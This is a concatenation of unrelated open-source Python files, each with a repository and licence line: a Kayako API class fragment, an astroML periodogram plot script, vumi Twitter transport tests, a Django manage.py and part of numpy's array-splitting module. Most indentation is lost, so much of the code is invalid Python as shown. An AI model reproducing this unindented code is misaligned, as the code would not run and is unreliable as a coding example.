parentkbcategoryid=cls._get_int(_parse_knowledgebase_category.find('parentkbcategoryid')),
staffid=cls._get_int(_parse_knowledgebase_category.find('staffid')),
title=cls._get_string(_parse_knowledgebase_category.find('title')),
totalarticles=cls._get_int(_parse_knowledgebase_category.find('totalarticles')),
categorytype=cls._get_int(_parse_knowledgebase_category.find('categorytype')),
displayorder=cls._get_int(_parse_knowledgebase_category.find('displayorder')),
allowcomments=cls._get_boolean(_parse_knowledgebase_category.find('allowcomments')),
uservisibilitycustom=cls._get_boolean(_parse_knowledgebase_category.find('uservisibilitycustom')),
usergroupidlist=usergroups,
staffvisibilitycustom=cls._get_boolean(_parse_knowledgebase_category.find('staffvisibilitycustom')),
staffgroupidlist=staffgroups,
allowrating=cls._get_boolean(_parse_knowledgebase_category.find('allowrating')),
ispublished=cls._get_boolean(_parse_knowledgebase_category.find('ispublished')),
)
return params
def _update_from_response(self, _parse_knowledgebase_category):
usergroups_node = _parse_knowledgebase_category.find('usergroupidlist')
if usergroups_node is not None:
usergroups = []
for id_node in usergroups_node.findall('usergroupid'):
id = self._get_int(id_node)
usergroups.append(id)
self.usergroupidlist = usergroups
for int_node in ['id', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'uservisibilitycustom', 'staffid']:
node = _parse_knowledgebase_category.find(int_node)
if node is not None:
setattr(self, int_node, self._get_int(node, required=False))
for str_node in ['title', 'staffvisibilitycustom']:
node = _parse_knowledgebase_category.find(str_node)
if node is not None:
setattr(self, str_node, self._get_string(node))
for bool_node in ['allowcomments', 'allowrating', 'ispublished']:
node = _parse_knowledgebase_category.find(bool_node)
if node is not None:
setattr(self, bool_node, self._get_boolean(node, required=False))
@classmethod
def get_all(cls, api, count=100, start=0):
response = api._request('%s/ListAll/%s/%s/' % (cls.controller, count, start), 'GET')
tree = etree.parse(response)
return [KnowledgebaseCategory(api, **cls._parse_knowledgebase_category(api, _parse_knowledgebase_category)) for _parse_knowledgebase_category in tree.findall('kbcategory')]
@classmethod
def get(cls, api, id):
response = api._request('%s/%s/' % (cls.controller, id), 'GET')
tree = etree.parse(response)
node = tree.find('kbcategory')
if node is None:
return None
params = cls._parse_knowledgebase_category(api, node)
return KnowledgebaseCategory(api, **params)
def add(self):
response = self._add(self.controller)
tree = etree.parse(response)
node = tree.find('kbcategory')
self._update_from_response(node)
def save(self):
response = self._save('%s/%s/' % (self.controller, self.id))
tree = etree.parse(response)
node = tree.find('kbcategory')
self._update_from_response(node)
def delete(self):
self._delete('%s/%s/' % (self.controller, self.id))
def __str__(self):
        return '<KnowledgebaseCategory (%s): %s>' % (self.id, self.title)
| sahilsehgal81/python-api-library | src/kayako/objects/knowledgebase/knowledgebase_category.py | Python | bsd-2-clause | 6,763
"""
Comparison of Lomb-Scargle Methods
----------------------------------
This shows a comparison of the Lomb-Scargle periodogram
and the Modified Lomb-Scargle periodogram for a single star,
along with the multi-term results.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from __future__ import print_function
import numpy as np
from matplotlib import pyplot as plt
from astroML.time_series import\
lomb_scargle, search_frequencies, multiterm_periodogram
from astroML.datasets import fetch_LINEAR_sample
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#id, period = 11375941, 58.4
id, period = 18525697, 17.05
data = fetch_LINEAR_sample()
t, y, dy = data[id].T
omega = np.linspace(period, period + 0.1, 1000)
fig = plt.figure(figsize=(5, 3.75))
ax = plt.subplot(211)
for n_terms in [1, 2, 3]:
P1 = multiterm_periodogram(t, y, dy, omega, n_terms=n_terms)
plt.plot(omega, P1, lw=1, label='m = %i' % n_terms)
plt.legend(loc=2)
plt.xlim(period, period + 0.1)
plt.ylim(0, 1.0)
plt.ylabel(r'$1 - \chi^2(\omega) / \chi^2_{ref}$')
plt.subplot(212, sharex=ax)
for generalized in [True, False]:
if generalized:
label = 'generalized LS'
else:
label = 'standard LS'
P2 = lomb_scargle(t, y, dy, omega, generalized=generalized)
plt.plot(omega, P2, lw=1, label=label)
plt.legend(loc=2)
plt.xlim(period, period + 0.1)
plt.ylim(0, 1.0)
plt.xlabel(r'frequency $\omega$')
plt.ylabel(r'$P_{LS}(\omega)$')
plt.show()
| nhuntwalker/astroML | book_figures/chapter10/fig_LS_comparison.py | Python | bsd-2-clause | 2,128 |
from twisted.internet.defer import inlineCallbacks
from txtwitter.tests.fake_twitter import FakeTwitter
from vumi.tests.utils import LogCatcher
from vumi.tests.helpers import VumiTestCase
from vumi.config import Config
from vumi.errors import ConfigError
from vumi.transports.twitter import (
ConfigTwitterEndpoints, TwitterTransport)
from vumi.transports.tests.helpers import TransportHelper
class TestTwitterEndpointsConfig(VumiTestCase):
def test_clean_no_endpoints(self):
class ToyConfig(Config):
endpoints = ConfigTwitterEndpoints("test endpoints")
self.assertRaises(ConfigError, ToyConfig, {'endpoints': {}})
def test_clean_same_endpoints(self):
class ToyConfig(Config):
endpoints = ConfigTwitterEndpoints("test endpoints")
self.assertRaises(ConfigError, ToyConfig, {'endpoints': {
'dms': 'default',
'tweets': 'default'
}})
class TestTwitterTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.twitter = FakeTwitter()
self.user = self.twitter.new_user('me', 'me')
self.client = self.twitter.get_client(self.user.id_str)
self.patch(
TwitterTransport, 'get_client', lambda *a, **kw: self.client)
self.tx_helper = self.add_helper(TransportHelper(TwitterTransport))
self.config = {
'screen_name': 'me',
'consumer_key': 'consumer1',
'consumer_secret': 'consumersecret1',
'access_token': 'token1',
'access_token_secret': 'tokensecret1',
'terms': ['arnold', 'the', 'term'],
'endpoints': {
'tweets': 'tweet_endpoint',
'dms': 'dm_endpoint'
}
}
self.transport = yield self.tx_helper.get_transport(self.config)
def test_config_endpoints_default(self):
del self.config['endpoints']
self.config['transport_name'] = 'twitter'
config = TwitterTransport.CONFIG_CLASS(self.config)
self.assertEqual(config.endpoints, {'tweets': 'default'})
@inlineCallbacks
def test_config_no_tracking_stream(self):
self.config['terms'] = []
transport = yield self.tx_helper.get_transport(self.config)
self.assertEqual(transport.track_stream, None)
@inlineCallbacks
def test_tracking_tweets(self):
someone = self.twitter.new_user('someone', 'someone')
tweet = self.twitter.new_tweet('arnold', someone.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], 'NO_USER')
self.assertEqual(msg['content'], 'arnold')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': None,
'in_reply_to_screen_name': None,
'user_mentions': []
}
})
@inlineCallbacks
def test_tracking_reply_tweets(self):
someone = self.twitter.new_user('someone', 'someone')
someone_else = self.twitter.new_user('someone_else', 'someone_else')
tweet1 = self.twitter.new_tweet('@someone_else hello', someone.id_str)
tweet2 = self.twitter.new_tweet(
'@someone arnold', someone_else.id_str, reply_to=tweet1.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone_else')
self.assertEqual(msg['to_addr'], '@someone')
self.assertEqual(msg['content'], 'arnold')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet2.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': tweet1.id_str,
'in_reply_to_screen_name': 'someone',
'user_mentions': [{
'id_str': someone.id_str,
'id': int(someone.id_str),
'indices': [0, 8],
'screen_name': someone.screen_name,
'name': someone.name,
}]
}
})
def test_tracking_own_messages(self):
with LogCatcher() as lc:
tweet = self.twitter.new_tweet('arnold', self.user.id_str)
tweet = tweet.to_dict(self.twitter)
self.assertTrue(any(
"Tracked own tweet:" in msg for msg in lc.messages()))
@inlineCallbacks
def test_inbound_tweet(self):
someone = self.twitter.new_user('someone', 'someone')
tweet = self.twitter.new_tweet('@me hello', someone.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'hello')
self.assertEqual(msg.get_routing_endpoint(), 'tweet_endpoint')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': None,
'in_reply_to_screen_name': 'me',
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [0, 3],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
@inlineCallbacks
def test_inbound_tweet_reply(self):
someone = self.twitter.new_user('someone', 'someone')
tweet1 = self.twitter.new_tweet('@someone hello', self.user.id_str)
tweet2 = self.twitter.new_tweet(
'@me goodbye', someone.id_str, reply_to=tweet1.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'goodbye')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet2.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': tweet1.id_str,
'in_reply_to_screen_name': 'me',
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [0, 3],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
def test_inbound_own_tweet(self):
with LogCatcher() as lc:
self.twitter.new_tweet('hello', self.user.id_str)
self.assertTrue(any(
"Received own tweet on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_tweet_no_endpoint(self):
self.config['endpoints'] = {'dms': 'default'}
yield self.tx_helper.get_transport(self.config)
someone = self.twitter.new_user('someone', 'someone')
with LogCatcher() as lc:
self.twitter.new_tweet('@me hello', someone.id_str)
self.assertTrue(any(
"Discarding tweet received on user stream, no endpoint "
"configured for tweets" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_dm(self):
someone = self.twitter.new_user('someone', 'someone')
dm = self.twitter.new_dm('hello @me', someone.id_str, self.user.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'hello @me')
self.assertEqual(msg.get_routing_endpoint(), 'dm_endpoint')
self.assertEqual(msg['helper_metadata'], {
'dm_twitter': {
'id': dm.id_str,
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [6, 9],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
def test_inbound_own_dm(self):
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.new_dm('hello', self.user.id_str, someone.id_str)
self.assertTrue(any(
"Received own DM on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_dm_no_endpoint(self):
self.config['endpoints'] = {'tweets': 'default'}
yield self.tx_helper.get_transport(self.config)
someone = self.twitter.new_user('someone', 'someone')
with LogCatcher() as lc:
self.twitter.new_dm('hello @me', someone.id_str, self.user.id_str)
self.assertTrue(any(
"Discarding DM received on user stream, no endpoint "
"configured for DMs" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_auto_following(self):
self.config['autofollow'] = True
yield self.tx_helper.get_transport(self.config)
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(someone.id_str, self.user.id_str)
self.assertTrue(any(
"Received follow on user stream" in msg
for msg in lc.messages()))
self.assertTrue(any(
"Auto-following '@someone'" in msg
for msg in lc.messages()))
follow = self.twitter.get_follow(self.user.id_str, someone.id_str)
self.assertEqual(follow.source_id, self.user.id_str)
self.assertEqual(follow.target_id, someone.id_str)
@inlineCallbacks
def test_auto_following_disabled(self):
self.config['autofollow'] = False
yield self.tx_helper.get_transport(self.config)
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(someone.id_str, self.user.id_str)
self.assertTrue(any(
"Received follow on user stream" in msg
for msg in lc.messages()))
follow = self.twitter.get_follow(self.user.id_str, someone.id_str)
self.assertTrue(follow is None)
def test_inbound_own_follow(self):
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(self.user.id_str, someone.id_str)
self.assertTrue(any(
"Received own follow on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_tweet_sending(self):
self.twitter.new_user('someone', 'someone')
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', to_addr='@someone', endpoint='tweet_endpoint')
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
tweet = self.twitter.get_tweet(ack['sent_message_id'])
self.assertEqual(tweet.text, '@someone hello')
self.assertEqual(tweet.reply_to, None)
@inlineCallbacks
def test_tweet_reply_sending(self):
tweet1 = self.twitter.new_tweet(
'hello', self.user.id_str, endpoint='tweet_endpoint')
inbound_msg = self.tx_helper.make_inbound(
'hello',
from_addr='@someone',
endpoint='tweet_endpoint',
transport_metadata={
'twitter': {'status_id': tweet1.id_str}
})
msg = yield self.tx_helper.make_dispatch_reply(inbound_msg, "goodbye")
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
tweet2 = self.twitter.get_tweet(ack['sent_message_id'])
self.assertEqual(tweet2.text, '@someone goodbye')
self.assertEqual(tweet2.reply_to, tweet1.id_str)
@inlineCallbacks
def test_tweet_sending_failure(self):
def fail(*a, **kw):
raise Exception(':(')
self.patch(self.client, 'statuses_update', fail)
with LogCatcher() as lc:
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', endpoint='tweet_endpoint')
self.assertEqual(
[e['message'][0] for e in lc.errors],
["'Outbound twitter message failed: :('"])
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'], ':(')
@inlineCallbacks
def test_dm_sending(self):
self.twitter.new_user('someone', 'someone')
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', to_addr='@someone', endpoint='dm_endpoint')
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
dm = self.twitter.get_dm(ack['sent_message_id'])
sender = self.twitter.get_user(dm.sender_id_str)
recipient = self.twitter.get_user(dm.recipient_id_str)
self.assertEqual(dm.text, 'hello')
self.assertEqual(sender.screen_name, 'me')
self.assertEqual(recipient.screen_name, 'someone')
@inlineCallbacks
def test_dm_sending_failure(self):
def fail(*a, **kw):
raise Exception(':(')
self.patch(self.client, 'direct_messages_new', fail)
with LogCatcher() as lc:
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', endpoint='dm_endpoint')
self.assertEqual(
[e['message'][0] for e in lc.errors],
["'Outbound twitter message failed: :('"])
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'], ':(')
def test_track_stream_for_non_tweet(self):
with LogCatcher() as lc:
self.transport.handle_track_stream({'foo': 'bar'})
self.assertEqual(
lc.messages(),
["Received non-tweet from tracking stream: {'foo': 'bar'}"])
def test_user_stream_for_unsupported_message(self):
with LogCatcher() as lc:
self.transport.handle_user_stream({'foo': 'bar'})
self.assertEqual(
lc.messages(),
["Received a user stream message that we do not handle: "
"{'foo': 'bar'}"])
def test_tweet_content_with_mention_at_start(self):
self.assertEqual('hello', self.transport.tweet_content({
'id_str': '12345',
'text': '@fakeuser hello',
'user': {},
'entities': {
'user_mentions': [{
'id_str': '123',
'screen_name': 'fakeuser',
'name': 'Fake User',
'indices': [0, 8]
}]
},
}))
def test_tweet_content_with_mention_not_at_start(self):
self.assertEqual('hello @fakeuser!', self.transport.tweet_content({
'id_str': '12345',
'text': 'hello @fakeuser!',
'user': {},
'entities': {
'user_mentions': [{
'id_str': '123',
'screen_name': 'fakeuser',
'name': 'Fake User',
'indices': [6, 14]
}]
},
}))
def test_tweet_content_with_no_mention(self):
self.assertEqual('hello', self.transport.tweet_content({
'id_str': '12345',
'text': 'hello',
'user': {},
'entities': {
'user_mentions': []
},
}))
def test_tweet_content_with_no_user_in_text(self):
self.assertEqual('NO_USER hello', self.transport.tweet_content({
'id_str': '12345',
'text': 'NO_USER hello',
'user': {},
'entities': {
'user_mentions': []
},
}))
| TouK/vumi | vumi/transports/twitter/tests/test_twitter.py | Python | bsd-3-clause | 16,928 |
#!/usr/bin/env python
import os
import sys
import envdir
if __name__ == "__main__":
if 'test' in sys.argv:
env_dir = os.path.join('tests', 'envdir')
else:
env_dir = 'envdir'
envdir.read(os.path.join(os.path.dirname(__file__), env_dir))
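    # envdir.read() exports each file in the chosen directory as an environment
    # variable (file name -> file contents) before the Django settings module is
    # imported below.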
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| feedhq/feedhq | manage.py | Python | bsd-3-clause | 374 |
from __future__ import division, absolute_import, print_function
import warnings
import numpy.core.numeric as _nx
from numpy.core.numeric import (
asarray, zeros, outer, concatenate, isscalar, array, asanyarray
)
from numpy.core.fromnumeric import product, reshape
from numpy.core import vstack, atleast_3d
__all__ = [
'column_stack', 'row_stack', 'dstack', 'array_split', 'split',
'hsplit', 'vsplit', 'dsplit', 'apply_over_axes', 'expand_dims',
'apply_along_axis', 'kron', 'tile', 'get_array_wrap'
]
def apply_along_axis(func1d, axis, arr, *args, **kwargs):
"""
Apply a function to 1-D slices along the given axis.
Execute `func1d(a, *args)` where `func1d` operates on 1-D arrays and `a`
is a 1-D slice of `arr` along `axis`.
Parameters
----------
func1d : function
This function should accept 1-D arrays. It is applied to 1-D
slices of `arr` along the specified axis.
axis : integer
Axis along which `arr` is sliced.
arr : ndarray
Input array.
args : any
Additional arguments to `func1d`.
kwargs: any
Additional named arguments to `func1d`.
.. versionadded:: 1.9.0
Returns
-------
apply_along_axis : ndarray
The output array. The shape of `outarr` is identical to the shape of
`arr`, except along the `axis` dimension, where the length of `outarr`
is equal to the size of the return value of `func1d`. If `func1d`
        returns a scalar, `outarr` will have one fewer dimension than `arr`.
See Also
--------
apply_over_axes : Apply a function repeatedly over multiple axes.
Examples
--------
>>> def my_func(a):
... \"\"\"Average first and last element of a 1-D array\"\"\"
... return (a[0] + a[-1]) * 0.5
>>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> np.apply_along_axis(my_func, 0, b)
array([ 4., 5., 6.])
>>> np.apply_along_axis(my_func, 1, b)
array([ 2., 5., 8.])
For a function that doesn't return a scalar, the number of dimensions in
`outarr` is the same as `arr`.
>>> b = np.array([[8,1,7], [4,3,9], [5,2,6]])
>>> np.apply_along_axis(sorted, 1, b)
array([[1, 7, 8],
[3, 4, 9],
[2, 5, 6]])
"""
arr = asarray(arr)
nd = arr.ndim
if axis < 0:
axis += nd
if (axis >= nd):
raise ValueError("axis must be less than arr.ndim; axis=%d, rank=%d."
% (axis, nd))
ind = [0]*(nd-1)
i = zeros(nd, 'O')
indlist = list(range(nd))
indlist.remove(axis)
i[axis] = slice(None, None)
outshape = asarray(arr.shape).take(indlist)
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
# if res is a number, then we have a smaller output array
if isscalar(res):
outarr = zeros(outshape, asarray(res).dtype)
outarr[tuple(ind)] = res
Ntot = product(outshape)
k = 1
while k < Ntot:
# increment the index
ind[-1] += 1
n = -1
while (ind[n] >= outshape[n]) and (n > (1-nd)):
ind[n-1] += 1
ind[n] = 0
n -= 1
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
outarr[tuple(ind)] = res
k += 1
return outarr
else:
Ntot = product(outshape)
holdshape = outshape
outshape = list(arr.shape)
outshape[axis] = len(res)
outarr = zeros(outshape, asarray(res).dtype)
outarr[tuple(i.tolist())] = res
k = 1
while k < Ntot:
# increment the index
ind[-1] += 1
n = -1
while (ind[n] >= holdshape[n]) and (n > (1-nd)):
ind[n-1] += 1
ind[n] = 0
n -= 1
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
outarr[tuple(i.tolist())] = res
k += 1
return outarr
def apply_over_axes(func, a, axes):
"""
Apply a function repeatedly over multiple axes.
`func` is called as `res = func(a, axis)`, where `axis` is the first
element of `axes`. The result `res` of the function call must have
either the same dimensions as `a` or one less dimension. If `res`
has one less dimension than `a`, a dimension is inserted before
`axis`. The call to `func` is then repeated for each axis in `axes`,
with `res` as the first argument.
Parameters
----------
func : function
This function must take two arguments, `func(a, axis)`.
a : array_like
Input array.
axes : array_like
Axes over which `func` is applied; the elements must be integers.
Returns
-------
apply_over_axis : ndarray
The output array. The number of dimensions is the same as `a`,
but the shape can be different. This depends on whether `func`
changes the shape of its output with respect to its input.
See Also
--------
apply_along_axis :
Apply a function to 1-D slices of an array along the given axis.
Notes
    -----
    This function is equivalent to tuple axis arguments to reorderable ufuncs
    with keepdims=True. Tuple axis arguments to ufuncs have been available since
    version 1.7.0.
Examples
--------
>>> a = np.arange(24).reshape(2,3,4)
>>> a
array([[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]])
Sum over axes 0 and 2. The result has same number of dimensions
as the original array:
>>> np.apply_over_axes(np.sum, a, [0,2])
array([[[ 60],
[ 92],
[124]]])
Tuple axis arguments to ufuncs are equivalent:
>>> np.sum(a, axis=(0,2), keepdims=True)
array([[[ 60],
[ 92],
[124]]])
"""
val = asarray(a)
N = a.ndim
if array(axes).ndim == 0:
axes = (axes,)
for axis in axes:
if axis < 0:
axis = N + axis
args = (val, axis)
res = func(*args)
if res.ndim == val.ndim:
val = res
else:
res = expand_dims(res, axis)
if res.ndim == val.ndim:
val = res
else:
raise ValueError("function is not returning "
"an array of the correct shape")
return val
def expand_dims(a, axis):
"""
Expand the shape of an array.
Insert a new axis, corresponding to a given position in the array shape.
Parameters
----------
a : array_like
Input array.
axis : int
Position (amongst axes) where new axis is to be inserted.
Returns
-------
res : ndarray
Output array. The number of dimensions is one greater than that of
the input array.
See Also
--------
doc.indexing, atleast_1d, atleast_2d, atleast_3d
Examples
--------
>>> x = np.array([1,2])
>>> x.shape
(2,)
The following is equivalent to ``x[np.newaxis,:]`` or ``x[np.newaxis]``:
>>> y = np.expand_dims(x, axis=0)
>>> y
array([[1, 2]])
>>> y.shape
(1, 2)
>>> y = np.expand_dims(x, axis=1) # Equivalent to x[:,newaxis]
>>> y
array([[1],
[2]])
>>> y.shape
(2, 1)
Note that some examples may use ``None`` instead of ``np.newaxis``. These
are the same objects:
>>> np.newaxis is None
True
"""
a = asarray(a)
shape = a.shape
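    # A negative `axis` refers to a position in the *output* array, which has
    # ndim + 1 valid slots, hence the extra + 1 when normalizing it below.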
if axis < 0:
axis = axis + len(shape) + 1
return a.reshape(shape[:axis] + (1,) + shape[axis:])
row_stack = vstack
def column_stack(tup):
"""
Stack 1-D arrays as columns into a 2-D array.
Take a sequence of 1-D arrays and stack them as columns
to make a single 2-D array. 2-D arrays are stacked as-is,
just like with `hstack`. 1-D arrays are turned into 2-D columns
first.
Parameters
----------
tup : sequence of 1-D or 2-D arrays.
Arrays to stack. All of them must have the same first dimension.
Returns
-------
stacked : 2-D array
The array formed by stacking the given arrays.
See Also
--------
hstack, vstack, concatenate
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.column_stack((a,b))
array([[1, 2],
[2, 3],
[3, 4]])
"""
arrays = []
for v in tup:
arr = array(v, copy=False, subok=True)
if arr.ndim < 2:
arr = array(arr, copy=False, subok=True, ndmin=2).T
arrays.append(arr)
return _nx.concatenate(arrays, 1)
def dstack(tup):
"""
Stack arrays in sequence depth wise (along third axis).
Takes a sequence of arrays and stack them along the third axis
to make a single array. Rebuilds arrays divided by `dsplit`.
This is a simple way to stack 2D arrays (images) into a single
3D array for processing.
Parameters
----------
tup : sequence of arrays
Arrays to stack. All of them must have the same shape along all
but the third axis.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays.
See Also
--------
stack : Join a sequence of arrays along a new axis.
vstack : Stack along first axis.
hstack : Stack along second axis.
concatenate : Join a sequence of arrays along an existing axis.
dsplit : Split array along third axis.
Notes
-----
Equivalent to ``np.concatenate(tup, axis=2)``.
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.dstack((a,b))
array([[[1, 2],
[2, 3],
[3, 4]]])
>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.dstack((a,b))
array([[[1, 2]],
[[2, 3]],
[[3, 4]]])
"""
return _nx.concatenate([atleast_3d(_m) for _m in tup], 2)
def _replace_zero_by_x_arrays(sub_arys):
for i in range(len(sub_arys)):
if len(_nx.shape(sub_arys[i])) == 0:
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
elif _nx.sometrue(_nx.equal(_nx.shape(sub_arys[i]), 0)):
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
return sub_arys
def array_split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays.
Please refer to the ``split`` documentation. The only difference
between these functions is that ``array_split`` allows
`indices_or_sections` to be an integer that does *not* equally
divide the axis.
See Also
--------
split : Split array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(8.0)
>>> np.array_split(x, 3)
[array([ 0., 1., 2.]), array([ 3., 4., 5.]), array([ 6., 7.])]
"""
try:
Ntotal = ary.shape[axis]
except AttributeError:
Ntotal = len(ary)
try:
# handle scalar case.
Nsections = len(indices_or_sections) + 1
div_points = [0] + list(indices_or_sections) + [Ntotal]
except TypeError:
# indices_or_sections is a scalar, not an array.
Nsections = int(indices_or_sections)
if Nsections <= 0:
raise ValueError('number sections must be larger than 0.')
Neach_section, extras = divmod(Ntotal, Nsections)
section_sizes = ([0] +
extras * [Neach_section+1] +
(Nsections-extras) * [Neach_section])
div_points = _nx.array(section_sizes).cumsum()
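        # For example, Ntotal=8 and Nsections=3 give Neach_section=2, extras=2,
        # so section_sizes=[0, 3, 3, 2] and div_points=[0, 3, 6, 8] -- the
        # [3, 3, 2]-sized split shown in the docstring example above.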
sub_arys = []
sary = _nx.swapaxes(ary, axis, 0)
for i in range(Nsections):
st = div_points[i]
end = div_points[i + 1]
sub_arys.append(_nx.swapaxes(sary[st:end], axis, 0))
return sub_arys
def split(ary,indices_or_sections,axis=0):
"""
Split an array into multiple sub-arrays.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D array
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division.
See Also
--------
array_split : Split an array into multiple sub-arrays of equal or
near-equal size. Does not raise an exception if
an equal division cannot be made.
hsplit : Split array into multiple sub-arrays horizontally (column-wise).
vsplit : Split array into multiple sub-arrays vertically (row wise).
dsplit : Split array into multiple sub-arrays along the 3rd axis (depth).
concatenate : Join a sequence of arrays along an existing axis.
stack : Join a sequence of arrays along a new axis.
hstack : Stack arrays in sequence horizontally (column wise).
vstack : Stack arrays in sequence vertically (row wise).
dstack : Stack arrays in sequence depth wise (along third dimension).
Examples
--------
>>> x = np.arange(9.0)
>>> np.split(x, 3)
[array([ 0., 1., 2.]), array([ 3., 4., 5.]), array([ 6., 7., 8.])]
>>> x = np.arange(8.0)
>>> np.split(x, [3, 5, 6, 10])
[array([ 0., 1., 2.]),
array([ 3., 4.]),
array([ 5.]),
array([ 6., 7.]),
array([], dtype=float64)]
"""
try:
len(indices_or_sections)
except TypeError:
sections = indices_or_sections
N = ary.shape[axis]
if N % sections:
raise ValueError(
'array split does not result in an equal division')
res = array_split(ary, indices_or_sections, axis)
return res
def hsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays horizontally (column-wise).
Please refer to the `split` documentation. `hsplit` is equivalent
to `split` with ``axis=1``, the array is always split along the second
axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])
>>> np.hsplit(x, 2)
[array([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[ 12., 13.]]),
array([[ 2., 3.],
[ 6., 7.],
[ 10., 11.],
[ 14., 15.]])]
>>> np.hsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[ 12., 13., 14.]]),
array([[ 3.],
[ 7.],
[ 11.],
[ 15.]]),
